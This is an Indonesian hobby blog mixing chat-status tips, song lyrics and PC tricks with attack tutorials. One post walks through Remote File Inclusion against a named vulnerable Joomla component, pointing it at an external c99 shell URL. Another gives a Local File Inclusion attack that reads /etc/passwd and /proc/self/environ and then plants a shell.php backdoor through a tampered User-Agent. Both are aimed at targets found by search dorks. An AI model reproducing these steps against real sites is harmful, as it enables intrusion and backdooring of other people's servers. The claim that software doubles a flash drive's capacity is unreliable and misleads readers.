Status YM di Blog/Web


Untuk Script satus Ym saya memakai


Di script anda, di ganti angkanya..

Tinggal anda ganti t=9 dgn icon pilihan anda... :)

t=0

t0

t=1

t11

t=2

t2

t=3

t3

t=4

t4

t=5

t5

t=6

t6

t=7

t7

t=8

t8

t=9

t9


Tinggal di pilih :)


by biLLbud


Hacking Melalui RFI (Remote File Inclusion)



Apa itu RFI ?? RFI adalah metode hacking dengan menggunakan cara yaitu meng-include suatu file dari luar server.

Langsung saja :

Kita sediakan Injector(shell) kita, dalam hal ini saya menggunakan shell c99. ini injektor yang saya gunakan.
Kemudian kita cari target yang bisa kita dapatkan lewat search di Google atau pun lewat scanning IRC dengan kata kunci/dork nya anda bisa dapatkan di milw0rm.com atau bisa anda ambil di sini.

Misalkan kita mendapatkan target yaitu www.blabla.com/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=

Cara Injeksi nya yaitu menjadi www.targetanda.com/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=[shell anda] lebih jelas lagi menjadi www.targetanda.com/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://wonaza.webs.com/rfi.txt??

jika tidak ada tampilan apa² di browser maka target sudah tidak Vuln lagi....dan jika berhasil akan ada tampilan shell anda.. seperti contoh di bawah ini :



Selesai.

Don't Learn to Hack but Hack to Learn

by biLLbud

Lirik Sm*sh - I Heart You

kenapa hatiku cenat cenut tiap da kamu
selalu peluhku menetes tiap dekat kamu
kenapa salah tingkah tiap kau tatap aku
selalu diriku malu tiap kau puji aku

kenapa lidahku kelu tiap kau panggil aku
selalu merindu romaku tyap kau sentuh aku
kenapa otakku beku tyap memikirkanmu
selalu tubuhku lunglai tyap kau bisikan cinta

you know me so well
girl i need u
girl i love u
girl i heart u
i know you so well
girl i need u
girl i love u
girl i heart u

tahukah kamu saat kita pertama jumpa
hatiku berkata padamu ada yang berbeda
tahukah sejak kita sering jalan bersama
tiap jam, menit, detik ku hanya ingin berdua
tahukah kamu, ku takkan pernah lupa
saat kau bilang, punya rasa yang sama
ku tak menyangka
aku bahagia, ingin kupeluk dunia
kau izinkan aku tuk dapat rasakan cinta

you know me so well
girl i need u
girl i love u
girl i heart u
i know you so well
girl i need u
girl i love u
girl i heart u

ketika diriku rasakan cintamu yang buat kusalah tingkah
you know me so well, i know you so well
you heart me girl, i heart you back

girl i need u
girl i love u
girl i heart u beybeh(2x)

you know me so well
girl i need u
girl i love u
girl i heart u
i know you so well
girl i need u
girl i love u
girl i heart u
tak ada bisa memisahkan kita,
waktupun takkan tega, kau dan aku bersama, selamanya...


Website Speed Test

Apakah Web/Blog anda ringan atau berat??silahkan masukan URL anda ^_^

Your domain(s): Enter each address on a new line (Maximum 10)

(eg. iwebtool.com)






w3af Hacking Tool



w3af
adalah Web Application Attack dan Audit Framework. Tujuan proyek ini adalah untuk menciptakan sebuah kerangka untuk menemukan dan mengeksploitasi kerentanan aplikasi web. Jadi, dengan applikasi ini anda bisa dengan mudah meng-audit(scan) suatu website sehingga dapat mengetahui celah suatu website. Mengapa mudah?? karena applikasi ini mempunyai GUI(
Graphical User Interface) nya, baik itu untuk Linux(kalau di Backtrack udah ada) maupun Windows.

Untuk informasi lebih lanjut serta untuk mendownload nya silahkan klik di sini


by biLLbud

Bandwith(Traffic) adalah transfer data yang dilakukan oleh website anda. Bandwidth dipengaruhi dan ditentukan oleh jumlah pengunjung, banyaknya halaman yang dikunjungi dan juga besarnya file yang diakses.

Yang mepengaruhi Pemakaian Bandwith :

  1. Tampilan Website
  2. Saat website anda di akses, maka bandwidth account anda akan berkurang sebesar halaman yang di load(dalam ukuran Byte). Website dengan banyak gambar dan video tentu akan lebih cepat menghabiskan bandwidth dibanding website yang hanya menampilkan teks dan gambar.

  3. Upload dan Download
  4. Upload maupun Download file akan mengurangi bandwidth account Anda. Gunakan account anda dengan semaksimal mungkin, jika tidak diperlukan lebih baik mengurangi aktivitas upload/download.

  5. POP3 dan SMTP
  6. Penggunaan Email Client seperti outlook juga akan memakai bandwidth, baik itu mengirim email ataupun menerima. Attach file juga akan mengurangi lebih banyak bandwidth pada account Anda.
Bandwidth sangat penting bagi kelangsungan website Anda. Bandwidth anda habis, maka web tidak bisa diakses. Hati-hati dengan Unlimited Bandwidth karena secara logika juga hal ini sangat tidak dimungkinkan.

Layar Monitor Transparan

Dunia Komputer semakin canggih dengan adanya Komputer unik dengan Layar Monitor Transparan,















Gimana ?? Canggihkan ?? Hehe Kalau mau Pesan ajah.. Tapi kayaknya di Indonesia belum ada deh.. ... tapi bisa jadi juga udah ada.. xixixi.. who knows?? :D

my friend


by biLLbud

Havij SQL Injection Tool




Havij
adalah SQL Injection tool yang membantu penguji penetrasi untuk menemukan dan mengeksploitasi kerentanan SQL Injection di halaman web.

Hal ini dapat mengambil keuntungan dari sebuah aplikasi web yang rentan. Dengan menggunakan software ini pengguna dapat melakukan sidik jari back-end database, mengambil pengguna DBMS dan hash password, dump tabel dan kolom, mengambil data dari database, menjalankan pernyataan SQL dan bahkan mengakses sistem file yang mendasari dan mengeksekusi perintah pada sistem operasi.

Kekuatan Havij yang membuatnya berbeda dari tool lainnya adalah metode injeksi nya. Tingkat keberhasilan lebih dari 95% pada injectiong sasaran rentan menggunakan Havij.

User friendly GUI (Graphical User Interface) dari Havij dan pengaturan otomatis dan pendeteksian membuatnya mudah digunakan bagi semua orang bahkan pengguna amatir.


download di sini


by biLLbud

LFI (Local File Inclusion) adalah sebuah lubang pada site dimana attacker bisa mengakses semua file di dalam server dengan hanya melalui URL.

Ok kita langsung saja..yang mau saya share di sini ialah tutorial atau cara mengupload shell dari target LFI dengan Tamper Data.

########################################

fucking the Web Apps [LFI attack edition]

-=[ upload Shell via Target LFI dengan Tamper Data ]=-

1 - Pendahuluan2 - Mencari Target LFI3 - Memeriksa apakah proc / self / environ dapat diakses4 - Mengupload code shell injection5 - Akses shell or backdoor kita

=[1]= Pendahuluan

Dalam tutorial ini saya akan coba menunjukkan bagaimana Mencari atau mendapatkan target LFI , setelah itu bagai bagaimana kita memanfaatkan target tersebut dan mengupload shell injection (backdoor) ke dalam nya.

=[2]= Mencari Target LFI=> Sekarang saya akan coba memberikan sample atau contoh bagaimana cara menemukan target LFI , lets check it.example: http://www.target.com/index.php?page=blablabla

=> sekarang kita coba mengganti file setelah ?page= (blablabla) dengan ../example: http://www.target.com/index.php?page=..%2F

Jika kita mendapatkan pesan error seperti ini:Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1330

website or target tersebut kemungkinan besar can be attack with LFI ;)

untuk memastikan nya kita masuk ke step berikut nya yaitu mencoba meng access file /etc/passwd , for this step Lets make a request:

example: http://www.target.com/index.php?page=..%2F...etc%2Fpasswd

jika kita masih mendapat kan pesan error yg sama seperti di atas , berarti kita perlu or coba menambahkan beberapa directory (../../) lagi sampai pesan error hilang dan kita success meng access or menampilkan isi dari file /etc/passwd

contoh klw success akan muncul seperti ini: root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin test:x:13:30:test:/var/test:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin

=[3]=Memeriksa apakah proc/self/environ dapat diakses

sekarang mari kita periksa atau check apakah proc/self/environ dapat di access dengan cara mengganti /etc/passwd dengan proc/self/environ

contoh: http://www.target.com/index.php?page=..%2F...etc%2Fpasswd <= change etc/passwd with proc/self/environ

it will be like this: http://www.target.com/index.php?page=..%2F...lf%2Fenviron

jika success atau proc/self/environ dapat di access , maka kita akan mendapat pesan seperti berikut:

DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster@website.com SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at http://www.website.com/ Port 80

jika gagal atau blank atau error berarti proc/self/environ tidak dapat di access

NB: kemungkinan lain yg menyebab kan proc/self/environ tidak dapat di access ialah web or target kita menggunakan OS (operating system) FreeBSD

=[4]= Mengupload code shell injection (backdoor)

Di step ini kita akan mencoba mengupload shell injection (backdoor) kita ke dalam target yg tadi atau target yg proc/self/environ dapat di access.Bagaimana caranya ?Di sinilah peran Tamper data di perlukan.Apa itu Tamper Data ?

NB: Tamper data ialah salah satu Add-ons pada browser mozila yg dapat kita gunakan untuk mengganti user agent atau HTTP Header.

Bagaimana cara menggunakan nya ?Download dan install terlebih dahulu Tamper Data pada Add-ons mozila anda download here => https://addons.mozilla.org/en-US/firefox/addon/966

setelah tamper data di install , buka tamper data dan pada User-Agent masukan command code sebagai berikut:

NB: link injection nya dapat anda ganti dengan link injection anda sendiri jika anda punya atau tidak ingin memakai injection tersebut :)

command code tersebut akan men-download file shell.txt dan otomatis tersimpan dengan nama shell.php.jika tidak bekerja coba exec () karena sistem () dapat dinonaktifkan pada webserver dari php.ini

=[5]= Check or Akses shell backdoor kita

Sekarang mari kita periksa apakah script shell (backdoor) kita berhasil atau tersedia pada web target tadi dengan cara membuka:

www.target.com/shell.php

Jika success maka kita akan melihat tampilan backdoor shell kita ;)

just 4 sharing :)


by biLLbud

Cara Merubah Flashdisk 1gb menjadi 2gb

Berikut adalah cara membuat Flashdisk 1gb menjadi 2gb ....

Kita lihat bahwa pertama Flashdisk saya diproperties mempunyai kapasitas 1gb.



Format Flashdisk anda menjadi FAT ....





Setelah itu ,, jalankan softwarenya yang dapat anda download di sini.
Pilih lokasi drive di mana flashdisk anda berada



klik Fix





Silahkan remove flashdisk dan pasang lagi....lalu anda properties.



taraaaaaaaaaa ..... ^_^

Catatan : hanya untuk flashdisk 1gb.

by biLLbud

Cara Membuka File Thumbs

Kita selalu melihat sebuah file yang selalu dihidden kan yaitu file dengan nama Thumbs.db.
Sebenarnya apa sih file Thumbs.db itu???
Thumbs.db merupakan file yang digunakan untuk menyimpan copy file-file gambar ( thumbnail view ) di Windows Explorer. File ini berlokasi di folder yang berisi gambar atau foto. Fungsinya untuk mempercepat proses menampilkan preview gambar di folder tersebut.

Cara membukanya silahkan download aplikasi di sini. Setelah download selesai, jalankan aplikasi tersebut dan pilih File Analyze Thumbnail Database



Cari file Thumbs.db lalu pilih Open



Maka akan terbukalah file di dalamnya seperti berikut :



taraaaaaaaaaa.............
Ternyata file ini juga bisa dikatakan sebagai log atau database.
File ini menyimpan gambar yang pernah kita lihat di suatu folder, walaupun gambar tersebut telah kita hapus.

Semoga bermanfaat ^_^

by biLLbud